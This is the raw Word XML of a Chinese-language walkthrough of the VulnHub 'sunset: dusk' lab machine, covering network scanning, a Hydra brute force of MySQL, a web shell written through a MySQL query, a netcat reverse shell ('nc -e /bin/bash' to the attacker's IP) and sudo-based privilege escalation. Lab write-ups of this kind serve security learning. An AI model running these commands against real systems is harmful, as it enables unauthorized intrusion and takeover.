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A62CE" w14:textId="5549B8CB" w:rsidR="006C0B39" w:rsidRDefault="003B1A5B" w:rsidP="003B1A5B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084327DB" w14:textId="6FE4F0DD" w:rsidR="003B1A5B" w:rsidRDefault="003B1A5B" w:rsidP="003B1A5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接:</w:t>
      </w:r>
      <w:r w:rsidRPr="003B1A5B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="002F16D1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/sunset-dusk,404/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F996123" w14:textId="7B833686" w:rsidR="003B1A5B" w:rsidRDefault="003B1A5B" w:rsidP="003B1A5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新手级别，建议在v</w:t>
      </w:r>
      <w:r>
        <w:t>irutalbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下做，由于是在v</w:t>
      </w:r>
      <w:r>
        <w:t>irtualbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下做，所以偷懒了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7362F98D" w14:textId="73CFAFE2" w:rsidR="003B1A5B" w:rsidRDefault="003B1A5B" w:rsidP="003B1A5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="793391A2" wp14:editId="69D318A9">
            <wp:extent cx="4438878" cy="23686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6D69" w14:textId="47EA8E9B" w:rsidR="003B1A5B" w:rsidRDefault="003B1A5B" w:rsidP="003B1A5B"/>
    <w:p w14:paraId="0C6DABB9" w14:textId="240DDF39" w:rsidR="003B1A5B" w:rsidRDefault="003B1A5B" w:rsidP="003B1A5B"/>
    <w:p w14:paraId="43394933" w14:textId="77E0F15A" w:rsidR="00D35842" w:rsidRDefault="00D35842" w:rsidP="00D35842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0B980375" w14:textId="6B132E5D" w:rsidR="00D35842" w:rsidRDefault="00D35842" w:rsidP="003B1A5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是先用</w:t>
      </w:r>
      <w:r w:rsidR="00DE5D1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00DE5D1C">
        <w:t>etdiscover</w:t>
      </w:r>
      <w:r w:rsidR="00DE5D1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探测一波，直接找P</w:t>
      </w:r>
      <w:r w:rsidR="00DE5D1C">
        <w:t>CS</w:t>
      </w:r>
      <w:r w:rsidR="00DE5D1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以确定靶机I</w:t>
      </w:r>
      <w:r w:rsidR="00DE5D1C">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00DE5D1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为192.168.3.216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E683AA" w14:textId="2FE0870E" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="003B1A5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>netdiscover -r 192.168.3.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A9F682" w14:textId="3A62AB93" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="003B1A5B"/>
    <w:p w14:paraId="765CF1C7" w14:textId="2CEE94DC" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="003B1A5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04786DBD" w14:textId="14C16D56" w:rsidR="00D35842" w:rsidRDefault="00D35842" w:rsidP="003B1A5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29E4B27C" wp14:editId="27720A76">
            <wp:extent cx="4210050" cy="977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AB1" w14:textId="57D18DAB" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="003B1A5B"/>
    <w:p w14:paraId="1D34B97B" w14:textId="0ABC6DCB" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="003B1A5B"/>
    <w:p w14:paraId="79CCAA82" w14:textId="71FF74BC" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="003B1A5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后开始用nmap探测波端口,这次端口开的比较多开了，21，22，80，3306和80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5294196E" w14:textId="6A24C779" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="003B1A5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>nmap -A -sS -sV -v -p- 192.168.3.216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6DC4FA" w14:textId="702E494E" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="003B1A5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="080D58AC" wp14:editId="01350BD2">
            <wp:extent cx="4616687" cy="4673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1CAA" w14:textId="55EE8C0F" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="003B1A5B"/>
    <w:p w14:paraId="3B7FF032" w14:textId="056D567D" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="003B1A5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在浏览器里面输入I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以正常回显开挖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE5A569" w14:textId="4E9BAB3D" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="003B1A5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32169CE0" wp14:editId="2A88B97B">
            <wp:extent cx="5274310" cy="2567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4FB" w14:textId="62F7B6F4" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="003B1A5B"/>
    <w:p w14:paraId="5432AACC" w14:textId="06E1D91A" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x02:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挖掘3306端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F597A8" w14:textId="0AA031F8" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先用d</w:t>
      </w:r>
      <w:r>
        <w:t>irb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开挖，然而换了几个字典都挖不出/</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面出来，这时候我忽然想起开了个3306端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482AE2FF" w14:textId="3EA9BB47" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67A4CFE6" wp14:editId="37D7A09E">
            <wp:extent cx="3918151" cy="2660787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77E0" w14:textId="29044EBB" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C"/>
    <w:p w14:paraId="254D23C1" w14:textId="6B8713EE" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试连接以下，输入常见的密码，比如r</w:t>
      </w:r>
      <w:r>
        <w:t>oot, toor,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空都不行，不过起码证明对外开放可以连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402F1CD7" w14:textId="2E514FE4" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CE0AEE3" wp14:editId="006E7828">
            <wp:extent cx="4635738" cy="79379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9727" w14:textId="3DCCBC5F" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C"/>
    <w:p w14:paraId="72636E30" w14:textId="2A7E2517" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动Hydra爆破成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8E151" w14:textId="4461B94C" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F0FA56F" wp14:editId="21E80994">
            <wp:extent cx="4508732" cy="130181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7F8F" w14:textId="56F402AC" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C"/>
    <w:p w14:paraId="6A176975" w14:textId="5A11604D" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以正常连接N</w:t>
      </w:r>
      <w:r>
        <w:t>ICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576CD430" w14:textId="67A85258" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BEF4A52" wp14:editId="0CA2A72C">
            <wp:extent cx="4210266" cy="12954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FB25" w14:textId="2ACE307E" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C"/>
    <w:p w14:paraId="43272565" w14:textId="1A295BE4" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C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利用M</w:t>
      </w:r>
      <w:r>
        <w:t>YSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句话获得反弹s</w:t>
      </w:r>
      <w:r>
        <w:t>hell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21385137" w14:textId="662BCCF6" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里拜访一波8080端口里面提示了路径和一些文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D14509" w14:textId="3962E26B" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E020B64" wp14:editId="7672A71F">
            <wp:extent cx="4889751" cy="1581231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EFAD" w14:textId="72989796" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C"/>
    <w:p w14:paraId="62FC4655" w14:textId="1595B8E3" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入其中的文件可以正常回显</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221217DA" w14:textId="2BE2A7FE" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09ABCC29" wp14:editId="4190FF22">
            <wp:extent cx="5274310" cy="3508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8B6" w14:textId="2EDAF7F5" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C"/>
    <w:p w14:paraId="21674241" w14:textId="2F99A7A9" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后这里查了以下M</w:t>
      </w:r>
      <w:r>
        <w:t>YSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也有一句话，就是下面的s</w:t>
      </w:r>
      <w:r>
        <w:t>elect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidR="00CC642A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，写入一句话进入一个新文件，然后可以使用菜刀连接，再传一个P</w:t>
      </w:r>
      <w:r w:rsidR="00CC642A">
        <w:t>HP</w:t>
      </w:r>
      <w:r w:rsidR="00CC642A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹shell上去g</w:t>
      </w:r>
      <w:r w:rsidR="00CC642A">
        <w:t>etshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4CB1E1" w14:textId="34C1CDE5" w:rsidR="00DE5D1C" w:rsidRDefault="00DE5D1C" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AB4D4AB" wp14:editId="5CDA6076">
            <wp:extent cx="5274310" cy="11753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9952" w14:textId="1C8174E9" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C"/>
    <w:p w14:paraId="2D6ECC16" w14:textId="19713A4E" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不过这里为了方便还是把一句话的内容更改以下变成c</w:t>
      </w:r>
      <w:r>
        <w:t>md,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后插入nc一句话方便点，现在M</w:t>
      </w:r>
      <w:r>
        <w:t>YSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库插入一句话先</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113618CB" w14:textId="27D677B0" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CFB2491" wp14:editId="190CD62E">
            <wp:extent cx="4699242" cy="23496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5B00" w14:textId="1CAD4BCF" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C"/>
    <w:p w14:paraId="3F41F37B" w14:textId="73DD6DC1" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这时在8080端口刷新以下，插入成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49944D6B" w14:textId="10C88279" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34305320" wp14:editId="17B52DDE">
            <wp:extent cx="4908802" cy="166378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2203" w14:textId="35BFBB07" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C"/>
    <w:p w14:paraId="1776D23D" w14:textId="7E2CA4EE" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试输入一些命令执行语句成功执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF533F9" w14:textId="11C02A5C" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A5B3F68" wp14:editId="28C2017C">
            <wp:extent cx="3911801" cy="1066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D47B" w14:textId="27A86BD0" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C"/>
    <w:p w14:paraId="033CD485" w14:textId="3CCEB5BA" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么开启n</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">监听本地端口，然后输入nc一句话 </w:t>
      </w:r>
      <w:r>
        <w:t>nc -e /bin/bash 192.168.3.207</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功获得反弹s</w:t>
      </w:r>
      <w:r>
        <w:t>hell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DDEB5B" w14:textId="611E67D3" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BBC33B1" wp14:editId="788BD647">
            <wp:extent cx="5274310" cy="3316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FFE3" w14:textId="4F8835C9" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C"/>
    <w:p w14:paraId="378433B7" w14:textId="61907220" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顺便在/</w:t>
      </w:r>
      <w:r>
        <w:t>home/dusk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下得到f</w:t>
      </w:r>
      <w:r>
        <w:t>lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B52631" w14:textId="7D770F76" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68035C0B" wp14:editId="338D51CF">
            <wp:extent cx="2870348" cy="155583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9E7" w14:textId="346B4A94" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00DE5D1C"/>
    <w:p w14:paraId="1318E99C" w14:textId="6209C5DB" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00CC642A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一次提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF83D13" w14:textId="509D9C0B" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00CC642A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我是没想到有一天w</w:t>
      </w:r>
      <w:r>
        <w:t>ww-data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以执行一波s</w:t>
      </w:r>
      <w:r>
        <w:t>udo -l.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里上网查了下，可以用m</w:t>
      </w:r>
      <w:r>
        <w:t>ake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6FFFB" w14:textId="497823AB" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00CC642A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39FFF560" wp14:editId="3BEBD475">
            <wp:extent cx="4527783" cy="1003352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3083" w14:textId="6FB73551" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00CC642A"/>
    <w:p w14:paraId="62855F4E" w14:textId="2A0C2A09" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00CC642A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BEEBC5A" wp14:editId="61162812">
            <wp:extent cx="4759960" cy="88633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5989" w14:textId="415E94B4" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00CC642A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这里按照s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>udo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>的方法</w:t>
      </w:r>
      <w:r w:rsidR="00757AAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">更改以下加多一个 </w:t>
      </w:r>
      <w:r w:rsidR="00757AAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>-u dusk</w:t>
      </w:r>
      <w:r w:rsidR="00757AAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>才可以完美执行变成d</w:t>
      </w:r>
      <w:r w:rsidR="00757AAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>usk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647D107E" w14:textId="647BA397" w:rsidR="00CC642A" w:rsidRDefault="00CC642A" w:rsidP="00CC642A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="011CC3DA" wp14:editId="4E921FA0">
            <wp:extent cx="4426177" cy="8064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CEC4" w14:textId="08EC1929" w:rsidR="00757AAB" w:rsidRDefault="00757AAB" w:rsidP="00CC642A"/>
    <w:p w14:paraId="648DF95B" w14:textId="2F228216" w:rsidR="00757AAB" w:rsidRDefault="00757AAB" w:rsidP="00757AAB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二次提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E5430F" w14:textId="73948622" w:rsidR="00757AAB" w:rsidRDefault="00757AAB" w:rsidP="00757AAB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而让我迷惑的是w</w:t>
      </w:r>
      <w:r>
        <w:t>ww-data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以运行s</w:t>
      </w:r>
      <w:r>
        <w:t>udo -l,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而d</w:t>
      </w:r>
      <w:r>
        <w:t>usk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不可以运行。。。。然后这里输入了id一波，有猫腻，出现了一堆东西连docker都出来了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F9361A" w14:textId="23EAAE21" w:rsidR="00757AAB" w:rsidRDefault="00757AAB" w:rsidP="00757AAB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2777D421" wp14:editId="581B2767">
            <wp:extent cx="5274310" cy="217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F17D" w14:textId="5E71B27C" w:rsidR="00757AAB" w:rsidRDefault="00757AAB" w:rsidP="00757AAB"/>
